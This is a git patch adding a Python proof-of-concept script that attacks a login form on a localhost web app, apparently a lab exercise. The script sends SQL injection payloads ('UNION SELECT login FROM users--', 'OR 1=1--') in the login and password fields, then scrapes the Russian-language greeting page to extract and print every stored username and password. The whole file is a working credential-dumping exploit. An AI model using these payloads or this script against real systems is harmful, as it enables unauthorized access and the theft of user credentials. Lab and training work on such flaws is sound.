From d990cf54822b401c40d2768caf25c7eab245c442 Mon Sep 17 00:00:00 2001
From: OkunElya <okun.elya@gmail.com>
Date: Tue, 16 Dec 2025 02:26:01 +1000
Subject: [PATCH] working poc added MY BRAIN IS MELTIIINNG

---
 poc.py | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 poc.py

diff --git a/poc.py b/poc.py
new file mode 100644
index 0000000..a97d7d9
--- /dev/null
+++ b/poc.py
@@ -0,0 +1,26 @@
+import requests
+import re
+
+BASE_URL = "http://localhost:8000"
+
+login_payload = "' UNION SELECT login FROM users--"
+form_data = {"login": login_payload, "password": "' OR 1=1--"}
+response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+
+password_payload = "' UNION SELECT password FROM users--"
+form_data = {"login": password_payload, "password": "' OR 1=1--"}
+response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+
+logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
+passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
+
+logins= logins_raw.split("',), ('")
+passwords = passwords_raw.split("',), ('")
+
+
+if logins and passwords:
+    for i, (login, password) in enumerate(zip(logins, passwords)):
+        print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+else:
+    print("Не удалось извлечь данные.")
+